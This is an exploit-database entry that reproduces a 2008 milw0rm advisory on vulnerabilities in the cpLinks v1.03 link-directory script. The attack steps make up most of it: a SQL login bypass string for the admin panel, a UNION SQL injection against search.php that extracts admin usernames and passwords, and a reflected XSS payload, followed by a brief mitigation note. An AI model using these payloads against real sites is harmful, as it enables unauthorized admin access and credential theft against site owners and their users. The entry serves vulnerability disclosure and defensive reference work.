cpLinks v1.03 Multiple Vulnerabilities (bypass/SQL/XXS)

vendor:

cpLinks

by:

InjEctOr & FishEr762

8.8

CVSS

HIGH

Bypass/SQL/XSS

89, 79, 80

CWE

Product Name: cpLinks

Affected Version From: 01.03

Affected Version To: 01.03

Patch Exists: NO

Related CWE: N/A

CPE: a:cplinks:cpLinks

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

cpLinks v1.03 Multiple Vulnerabilities (bypass/SQL/XXS)

cpLinks v1.03 is vulnerable to bypass, SQL and XSS injection. An attacker can bypass the authentication by entering ' or 1=1 /* in the username field and can inject malicious SQL and XSS payloads in the search_category and search_text parameters of the search.php page.

Mitigation:

Input validation should be done on the server-side to prevent malicious payloads from being injected. Access to the admin panel should be restricted to trusted IP addresses.

Source

Exploit-DB raw data:

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: cpLinks v1.03 Multiple Vulnerabilities (bypass/SQL/XXS)


Author :: InjEctOr [s0f (at) w (dot) cn]

&& FishEr762  [SQ7 (at) w (dot) cn ]


Script Site :: http://www.cplinks.com/

Dork  :: ThinkinG 

Greets :: Allah ,TryaG TeaM & Muslims Hackers

Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.



--------------------------------------------[C o n t e x t]-----------------------------------------




##########################
##Expl0!T1 bypass login ##
##########################


http://[site]/[script]/admin/


in username filed insert:

' or 1=1 /*    

addition, some time must type any thing in password field



#####################################
## Explo!T 2  Reomte SQL Injection ##
#####################################

file/
search.php


@ line 57 ::


$query = "SELECT
			category,
			sub_category,
			title,
			url,
			description,
			status
			FROM mnl_links
			WHERE category='$search_category'
			AND description LIKE '%$search_text%'
			AND approved='yes'
			ORDER BY status, rec_timestamp";


search url: http://localhost/[script's_bad_day]/search.php

so just insert in search filed this query :)

' union select admin_username,admin_password,3,4,5,6 from mnl_admin/*


##################
## EXpl!T3 Xss  ##
##################


Vulnerability found in script search.php .. also !


in search field insert  >"> and then  xss c0de ::



example: >"><script>alert("!! InjEctOr TeaM Became Here !!")</script>>



############### T|-|4t'5 4ll ############### 


-------------------------------------------[End of  context]----------------------------------------

# milw0rm.com [2008-05-04]